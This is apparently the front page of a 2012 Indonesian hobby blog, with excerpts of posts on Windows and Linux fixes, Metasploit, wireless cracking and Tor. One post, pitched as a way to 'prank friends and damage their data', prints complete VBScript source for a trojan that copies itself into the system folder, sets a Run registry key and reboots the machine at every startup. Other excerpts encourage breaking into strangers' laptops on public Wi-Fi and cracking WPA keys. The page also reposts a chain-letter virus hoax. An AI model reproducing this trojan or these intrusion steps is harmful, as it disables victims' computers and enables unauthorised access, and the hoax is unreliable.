SELAMAT DATANG

SELAMAT DATANG DI BLOG INI --__CODE-NEWBIE__--

Kamis, 17 Mei 2012

Perang Dingin User Linux Dan Windows



Konflik antara Linux &  Windows
Oke, sebuah posting dengan judul yang rumit dan aneh. Disini, saya akan membahas apa yang menyebabkan konflik antara user windows dan linux beserta pemecahannya. Ada 2 golongan disini. Saya yakin bahwa user A akan berkata, “Ah, orang kurang kerjaan. Cuma bisa mbandingin windows dan linux. LOL!”. Sedangkan para user B akan berkata, “Hmm, apaan nih posting? Kayaknya penting untuk dibaca!”.
Ya, perkataan kedua user itu benar. Hanya saja kurang tepat. Terutama yang dikatakan user A, sangat-sangat kikuk. Tidak bisa membedakan kah anda antara kata “Pemecahan” dengan “Pembandingan”? Kalau saya punya uang, sudah pasti saya kirim lagi ke SD

Baiklah, yang pertama, saya jelaskan SEKALI LAGI fakta-fakta sebenarnya tentang linux :
Penjelasan.
  1. Linux tidak sepenuhnya aman
    Ya, saya berani 100% berkata seperti ini. Windows sangatlah rawan dengan virus dan desktop-attack lainnya. Tapi lumayan aman dengan web-attack.

Serang Balik Pengguna Netcut


Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab. Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang menggunakan NETCUT.

Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.


Attack Netcut
Langkahnya adalah:
  1. Harus sudah terdapat python compiler di komputer

Hacking & Online Aman Dengan TOR / VIDALIA


kali ini berbagi mengenai cara menggunakan TOR / Vidalia atau cara online aman dengan menggunakan TOR / VIDALIA atau cara hacking aman dengan  menggunakan TOR / VIDALIA atau cara lompat server dengan menggunakan VIDALIA / TOR.
Diasumsikan bahwa Anda adalah seorang hacker lintas negara, Anda dituntut oleh diri Anda sendiri untuk dapat mengamankan aktivitas online Anda dari campur tangan pihak lain utamanya pemerintah yang berwenang yang sewaktu-waktu dapat mengetahui keberadaan Anda dan menjebloskan Anda ke dalam penjara.
The Onion Router atau TOR adalah server yang membuat pengguna menjadi anonim dalam internet. TORberfungsi menyembunyikan pengguna internet. Orang yang menggunakan jaringan tor menggunakan jaringan onion routers. Hal ini membuat lokasi pengguna tetap rahasia.

Cara Mengatasi Error Missing mozsqlite3.dll


FastStoneEditor Cara gampang mengatasi missing mozsqlite3.dll di Windows 7Apakan anda pernah melihat gambar peringatan seperti di atas ? atau anda pernah mengalaminya ? Notifikasi ini selalu muncul setelah booting.
Sebenarnya secara keseluruhan system tidak terpengaruh. Atau lebih tepat pengaruhnya tidak tampak. Semua software juga bisa berjalan normal. Tetapi karena setiap kali booting notifikasi tersebut tampil, bagi saya itu cukup mengganggu. Apalagi banyak yang bilang itu gejala terinfeksi malware. Berikut adalah Cara mengatasi missing mozsqlite3.dll di Windows 7 / Cara gampang mengatasi missing mozsqlite3.dll

Tutorial Hacking Dengan Metasploit part 5


ARTIKEL KELIMA

Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda.
Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.
Untuk penemuan, Armitage mengekspos beberapa fitur-fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.

Armitage membantu dengan Remote Exploitation – menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.
Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.

Tutorial Hacking Dengan Metasploit part 4


ARTIKEL KEEMPAT

Kali ini saya akan berikan cara menerobos komputer orang
di area wifi seperti hotel, kampus atau restoran
dalam hal ini tentu saja saya pake OS Linux hehehe
Tentu kita ingin tahu data apa yang ada di dalam
setelah download metasploit for linux di http://www.metasploit.com/download/
Install dengan perintah
$su
# ./namafile.run
pilih yes
tidak perlu diupdate
Ok silahkan jalan-jalan di area hotspot di kampus, mall atau cafe/restoran
jangan lupa duduk yang manis dan tenang sambil minum juice (kopi kurang baik)

Tutorial Hacking Dengan Metasploit part 3


ARTIKEL KETIGA

Rasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.
Apakah itu metasploit ? Sulitkah menggunakannnya ?
Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer diexploitasi dengan script exploit : KAHT .
Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini

Tutorial Hacking Dengan Metasploit part 2


ARTIKEL KEDUA

Wew… keren ya judulnya… sebenernya tutorial kayak gini udah banyak sih di internet, cuma lagi iseng aja pengen nulis tentang metasploit. :*Pasti kalian semua udah pada kenal apa itu metasploit, kalo pengen lebih jelasnya baca aja di websitenya metasploit.
Tapi mungkin tutorial yang saya tulis ini baru pertama, soalnya OS yang saya pake lain dari yang lain. hehe.. Biasanya OS yang dipake buat aksi exploitasi adalah Backtrack, yang memang sudah teruji kehandalannya untuk Pentest (Penetration Testing). Pengen tau OS yang saya pake… ? hehe.. :p
Nah, sekedar share aja ya… OS yang saya pake adalah TealinuxOS 2.0 yang sudah dimodifikasi untuk keperluan pentest. :D Karena TealinuxOS merupakan turunan ubuntu maka, tutorial ini juga berlaku untuk semua distro turunan Ubuntu.
Sebelum belajar metasploit yang perlu disiapkan adalah :
  • Cemilan, buat ngilangin stress kalo exploitasinya gagal mulu… hehe :p
  • OS, terserah, yang penting Linux :D
  • Metasploit Framework, bisa donlod langsung di websitenya metasploit. trus langsung di install ya …
  • fping, install langsung aja, caranya “sudo apt-get install fping”
  • nmap, install langsung juga, caranya “sudo apt-get install nmap”
  • dan yang terakhir jangan lupa siapkan KORBANnya..wkwkwk…
langkah-langkahnya ikuti aja video yang udah saya buat ini,
Tutorialnya bisa di download DISINI

Tutorial Hacking Dengan Metasploit part 1


ARTIKEL PERTAMA

Selamat Pagi all, kali ini saya akan share sedikit tentang aplikasi hacker favorit saya. Yaitu adalah METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.
Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya :D . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.

WIRELESS HACKING TUTORIAL


WIRELESS HACKING TUTORIAL
WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WEP karena keamanan yang lemah, repot, atau WEP sangat pointless, karena bisa dicrack, walaupun biasanya memakan waktu cukup lama untuk memperoleh cukup data untuk mendapatkan password WEP, terutama password yang sangat panjang.

WIRELESS HACKING TOOL


WIRELESS HACKING TOOL
NetStumbler
Netstumbler yang dikenal sebagai Jaringan Stumbleris suatu alat acilitates detecting dari Wireless Lans menggunakan Wireless 802.11b, 802.11a dan 802.11g WLAN standar yang berjalan pada sistem operasi dari microsoft Win98 – Win Vista, ada versi lain juga yang disebut Anothere Mini Stumbler yang menggunakan sistem operasi Windows CE. Untuk alat” kecil yang bisa di genggam.

CARA 1 MENGHAPUS VIRUS SHORTCUT


CARA 1 MENGHAPUS VIRUS SHORTCUT


Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang ada di dalam USB flash disk menjadi shortcut tersebut

Cara menghilangkan sorthcut pada dekstop linux ubuntu


Cara menghilangkan sorthcut pada dekstop linux ubuntu

Para pengguna linux biasanya setiap kita membuka drive atau membuka file pasti muncul sorthcut yang bisa mengganggu pandangan mata kita terhadap desktop. Saya akan berbagi ilmu cara menghilangkan sorthcut pada dekstop linux anda. Langsung saja kita praktek.

cara mengatasi blue screen



blue screen
Masih tentang BlueScreen...
Si layar biru yang menyebalkan ini atau istilah kerennya “Blue Screen Of Death (BSOD)” terjadi karena adanya critical error pada Sistem Operasi Windows yang menyebabkan semua aplikasi yang sedang berjalan terpaksa harus dihentikan.

Jumat, 11 Mei 2012

Menampilkan File tersembunyi menggunakan command prompt


Menampilkan File tersembunyi menggunakan command prompt 
command prompt dapat menampilkan file sengaja atau tidak sengaja di sembunyikan dengan suatu perintah tertentu. saat kita menyembunyikan file dengan manual maka file tersebut dapat di kembalikan dengan perintah command prompt, walaupun bisa juga langsung di tampilkan dengan manual kembali.

Membobol Key Wireless Wpa

di windows itu seperti commen prompt, untuk mendapatkan cara membobol wep ikutin petunjuk di bawah ini.

backtrace
pertama-tama kita masukkan CD live backtrack 3,lalu restart kompinya,atau bisa langsung kita mainkan di VMware workstation,setelah instal file ISO-nya


buka konsul baru,dan masukkan perintah airmon-ng,lalu tekan enter...untuk melihat interface dari wireless kita (interface bisa berbeda-beda,tergantung merk dari device wireless tersebut

Kamis, 10 Mei 2012

cara membuat virus

Bagi2 ilmu nih sob.. buat kamu2 yang pengen isengin temen... n sekalian pengen rusak data2nya. ni ada cra gampang buat Virus dengan notepad.

*note copy semua source berikut kedalam notepad save as .Vbs (jika ingin mengaktifkan)
jika tidak biarkan tetap dalam file exstensi.txt
exapels: Uchiha_trojanHorse.VBS

Copy semua source di bawah ini:


rem - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)

createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"

sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub

set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close

set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")

set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem()

function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function

function rebootSystem()
strComputer = "."

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next

CARA INSTAL BACKTRACK 5


CARA INSTAL BACKTRACK 5



Berikut saya akan menjelaskan tutorial cara instalasi backtrack 5, mungkin sudah banyak yang tau, dan sudah banyak juga yang membuatkan tutorial cara instalasi backtrack 5, karena kebetulan saya juga adalah salah satu backtrack user (backtracker). tidak ada salahnya jika saya membuatkan tutorial yang sama.

Selasa, 08 Mei 2012

Cara Menghapus Virus Trojan Secara Cepat

Menghapus virus dari komputer Anda bisa, tergantung pada tingkat keahlian Anda menjadi suatu kegiatan yang sangat frustasi atau sederhana kasus pemeliharaan rutin. Profesional perangkat lunak antivirus telah membuatnya menjadi sangat sederhana untuk membersihkan komputer Anda dari tamu tak diundang ke komputer Anda. Tapi, bagaimana menghapus virus Trojan dengan perangkat lunak, kadang-kadang merupakan pertanyaan sulit untuk dijawab bagi banyak pengguna PC.

Kamis, 03 Mei 2012

cara instal ulang linux ubuntu



Baiklah kepada teman-teman yang ingin mencoba operating system linux Ubuntu disini saya akan menjelaskan

VIRUS KOMPUTER PALING BERBAHAYA BARU DITEMUKAN


VIRUS KOMPUTER PALING BERBAHAYA BARU DITEMUKAN



Saya baru mendapat email dari seorang temen yang isinya sebagai berikut:
Sebuah virus baru sudah ditemukan, dan digolongkan olehMicrosoft
sebagai yang paling merusak! Virus itu baru ditemukan pada hari Minggu
siang yang lalu oleh McAfee, dan belum ditemukan vaksin untuk
mengalahkannya.
Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi
informasi-informasi terpenting. Virus ini berjalan sebagai berikut:
*secara otomatis virus ini akan terkirim ke semua nama dalam daftar
alamat anda dengan judul “Sebuah Kartu Untuk Anda”(Une Carte Pour Vous,
atau A Card For You);
*begitu kartu virtual itu terbuka, virus itu akan membekukan komputer
sehingga penggunanya harus memulainya kembali; kalau anda menekan
CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero
dari Sektor Boot hard disk, sehingga hard disk akan rusak secara
permanen.
Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan
di New York . Peringatan ini telah diterima oleh pegawai Microsoft
sendiri.
Jangan membuka e-mail dengan judul “Sebuah kartu virtual untuk Anda” (
Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).
Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian
besar orang, seperti saya sendiri, lebih suka mendapat peringatan ini
25 kali daripada tidak sama sekali.
AWAS!!!
Jangan terima kontak “pti_bout_de_ chou @hotmail.com” . Ini virus yang
akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang
ada di dalam daftar alamat anda. Kalau anda tidak melakukannya dan
salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer
anda juga akan terkena..
VIRUS PALING JAHAT DARI YANG PERNAH ADA
Benar atau tidaknya email ini belum diketahui. Tapi sebagai pengguna komputer kita harus waspada dan hati2. Memang tidak ada yang aman di dunia ini…. para penjahat bisa berbuat apa saja dimana saja dan dalam bentuk apa saja…namanya juga setan.

Cara Install Ulang Windows XP


Cara Install Ulang Windows XP

Sebelumnya saya pernah membahas tentang cara melakukan install ulang Windows 7, dan kali ini kita menudur sedikit ke versi sebelumnya yaitu cara menginstall Windows XP pada komputer atau laptop.

Tutorial Cara Menginstall Windows 7 ultimate



Hal-hal yang harus dipersiapkan sebelum menginstall Ulang Windows menggunakan Windows 7 Ultimate :
  1. Siapkan DVD Windows 7 Ultimate
  2. Siapkan Serial Number yang biasanya berada di cover DVD Windows 7 Ultimate Original yang anda beli
  3. Siapkan Driver windows untuk komputer laptop anda –> sebagai panduan download driver baca cara download driver di situs resmi

Tutorial wireshark


Melihat TraceRoute Windows XP di Wireshark

Apakah ada yang belum mengetahui fungsi traceroute ? Saya rasa semua pasti sudah tahu, karena traceroute adalah program sederhana untuk melihat hop-hop dari computer kita ke suatu IP address di Internet. Di bawah ini adalah hasil copy paste dari traceroute notebook saya ke www.yahoo.com.
C:\>tracert www.yahoo.com

Tracing route to www.yahoo.com [209.131.36.158]
over a maximum of 30 hops:

1 1 ms 2 ms 2 ms AlliedTelesyn.ATI [192.168.1.1]
2 39 ms 36 ms 36 ms 1.subnet125-161-216.speedy.telkom.net.id [125.16
1.216.1]
3 * * * Request timed out.
4 40 ms 40 ms 41 ms 61.5.116.25
5 37 ms 35 ms 36 ms 61.5.119.110
6 255 ms 258 ms 255 ms tm.net.my [58.26.87.53]
7 349 ms 470 ms 350 ms 58.27.103.33
8 475 ms 353 ms 363 ms 203.106.6.162
9 353 ms 352 ms 355 ms 219.94.9.178
10 353 ms 343 ms 345 ms 58.27.101.158
11 343 ms 341 ms 357 ms ae1-p171.msr2.sp1.yahoo.com [216.115.107.87]
12 347 ms 353 ms 355 ms ae0-p171.msr2.sp1.yahoo.com [216.115.107.83]
13 353 ms 351 ms 359 ms www.yahoo.com [209.131.36.158]

Trace complete.

Untuk lebih memperdalam mengenal paket pada jaringan, saya mencoba menangkap paket traceroute ini dengan wireshark.

Selasa, 01 Mei 2012

Mencari DNS Tercepat Menggunakan NameBench


Mencari DNS Tercepat Menggunakan NameBench

Bagi yang menggunakan speedy mungkin sering mencari-cari DNS speedy yang tercepat ataupun anda yang senang menggunakan free public DNS  seperti DNS google, Open DNS, scrublt, DNSadvantage, dll

Daripada kita nge-ping satu-satu DNS lebih baik kita menggunakan Namebench, software yang dibuat dengan menggunakan bahasa python ini berfungsi untuk mengetahui DNS mana yang paling cepat dan stabil untuk koneksi komputer kita. 

Software ini akan mengecek secara otomatis DNS kemudian akan merekomendasikan DNS mana yang tercepat untuk koneksi kita.

1. Jika berminat silahkan download Namebench Disini

2. Setelah itu, jalankan namebench-nya kemudian masukkan daftar DNS pada kolom Nameserver, seperti gambar di bawah ini
  • Masukkan DNS



3. Kemudian klik Start Benchmark, proses ini akan memerlukan waktu yang cukup lama (tergantung dari koneksi komputer kita), 

4. Setelah proses selesai maka akan terlihat DNS mana yang tercepat.
  • Hasil DNS Tercepat

 

Berikut beberapa daftar DNS:

DNS Speedy :
  • 125.160.14.189,
  • 202.134.0.61,
  • 202.134.0.155,
  • 202.134.1.5,
  • 202.134.1.10,
  • 202.134.1.10,
  • 203.130.0.155,
  • 203.130.196.5,
  • 203.130.206.250,
  • 203.130.193.74
  • 203.130.208.18,
  • 203.130.196.155,
  • 203.130.209.242
  • 61.94.192.12
  • 222.124.204.34

OPen DNS:
  • 208.67.222.222,
  • 208.67.220.220,

DNS google:
  • 8.8.8.8,
  • 8.8.4.4,

DNS Nawala:
  • 180.131.144.144,
  • 180.131.145.145

Dnsadvantage:
  • 156.154.70.1
  • 156.154.71.1

Mengatasi Masalah USB Autorun


Mengatasi Masalah USB Autorun

BitDefender USB Immunizer adalah alat sederhana yang dapat mengurangi kemungkinan flash drive USB anda terinfeksi oleh malware berbasis autorun

Dalam keadaan normal ini bisa terjadi sangat mudah.Yang perlu kamu lakukan adalah plug drive anda ke PC/Laptop yang terinfeksi, dan malware akan menyalin dirinya ke perangkat, menambahkan sebuah file autorun.inf custom. 

Bila kamu tersambung drive ke sistem di mana autorun diaktifkan, malware akan diluncurkan, dan PC/Laptop yang akan terinfeksi juga.

Google Docs Aplikasi Untuk Android


Google Docs Aplikasi Untuk Android


Semakin banyak orang menggunakan ponsel untuk mengakses informasi dari email ke browsing web untuk pengeditan dokumen, ini merupakan pekerjaan yang mampu dilakukan dengan mudah untuk mengakses, mengedit dan berbagi konten, dengan Google Docs


Dengan aplikasi Google Docs ini mampu untuk menyaring dan mencari konten anda di akun
 
---CODE__NEWBIE--- © 2011 Templates | uzanc